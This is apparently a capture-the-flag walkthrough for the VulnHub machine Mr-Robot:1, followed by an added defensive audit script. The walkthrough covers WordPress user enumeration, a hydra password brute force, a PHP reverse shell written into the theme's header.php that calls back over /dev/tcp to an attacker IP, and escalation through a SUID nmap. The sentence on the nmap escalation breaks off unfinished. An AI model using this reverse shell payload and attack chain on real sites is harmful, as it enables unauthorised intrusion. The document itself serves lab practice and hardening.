In this article we will try to gain root access to the machine Mr-Robot:1. This is also a beginner-level machine, and it can be downloaded from VulnHub.
The first step is to find the IP address of the target machine; for that we used the command: netdiscover -i wlan0
The next step is to check for hidden directories and files; for that we used the command: nmap --script http-enum.nse 192.168.43.87
There are many directories, but /robots.txt and /wp-login.php look useful to us.
So we start by exploring /robots.txt, and we find two new files, as we can see in the image.
Okay, now we have downloaded both files to our machine and read the contents of both:
The file fsocity.dic can be used as a brute-force wordlist. One thing is clear here: this website is running WordPress, so without wasting time we decided to find the credentials to log in to the control panel of the website. For that we used the tool wpscan. To know more about this tool, please read the article: https://www.haclabs.org/post/wordpress-penetration-testing
So we decided to enumerate users, and we found a user, elliot.
Now it's time to perform our attack (to find the password). We used the tool hydra for this.
And yes, we succeeded in finding the correct login details. Now it's time to log in to the website.
Okay, we are logged in successfully!
Now we decided to get a reverse shell, and for that we used PHP to execute it. We navigated to Appearance→Editor→header.php and used the command: <?php exec("/bin/bash -c 'bash -i>& /dev/tcp/192.168.43.249/443 0>&1'"); ?>
Now it's time to get the reverse shell, but don't forget to listen on port 443 using nc.
Now we write something random in the URL to trigger an error, and we have our reverse shell. To get a stable shell we used a Python one-liner.
Now it's time to find our key; for that we changed our directory to /home/robot and got a key.
After cracking this hash we get the password: abcdefghijklmnopqrstuvwxyz.
Now we can use this password to get a shell as the robot user with the command: su robot
After getting the shell of user robot we get one more key, as shown in the image.
Now we check for SUID binaries using the command: find / -perm /4000 -type f 2>/tmp/2
Yes, nmap can be used to get root access as
Done, we are root now! By changing our directory to /root we can read our final key.
Done!! This completes our challenge.
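The two weak points this walkthrough chains, the WordPress theme editor used to plant the PHP reverse shell and an unneeded SUID nmap, are both things a defender can audit for. The script below is an added example written for this article, not code from the original post or the author: it checks a wp-config.php for the DISALLOW_FILE_EDIT constant (which removes Appearance→Editor from the dashboard) and lists SUID files outside an allowlist; the allowlist contents and the paths in the usage lines are assumptions.

```shell
#!/bin/sh
# Added hardening audit for the two weak points in the walkthrough above:
# the WordPress in-dashboard file editor and an unexpected SUID binary.

# Print "editor-disabled" if $1 (a wp-config.php) sets DISALLOW_FILE_EDIT
# to true, which removes Appearance -> Editor; otherwise "editor-enabled".
wp_editor_status() {
    if grep -Eq "define\([[:space:]]*['\"]DISALLOW_FILE_EDIT['\"][[:space:]]*,[[:space:]]*true[[:space:]]*\)" "$1" 2>/dev/null; then
        echo editor-disabled
    else
        echo editor-enabled
    fi
}

# Print every SUID file under $1 whose basename is not in the space-separated
# allowlist $2 (e.g. "su sudo passwd"). Anything printed deserves a chmod u-s
# or removal. The allowlist is an assumption: build it from the host's baseline.
unexpected_suid() {
    allow=" $2 "
    find "$1" -perm -4000 -type f 2>/dev/null | while read -r f; do
        name=${f##*/}
        case "$allow" in
            *" $name "*) ;;        # expected SUID binary, skip
            *) echo "$f" ;;        # unexpected: investigate
        esac
    done
}

# Usage on a live host (assumed paths and allowlist):
# wp_editor_status /var/www/html/wp-config.php
# unexpected_suid / "su sudo passwd mount umount ping"
```

On the box in this walkthrough the second function would print the SUID nmap, and the first would report the editor as enabled; fixing both closes the two steps the chain depends on.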
About the Author: Harshit Rastogi is a pentester, bug hunter and Technical Writer at HacLabs. Contact him at: firstname.lastname@example.org
LinkedIn profile: https://www.linkedin.com/in/harshit-rastogi-0955231a0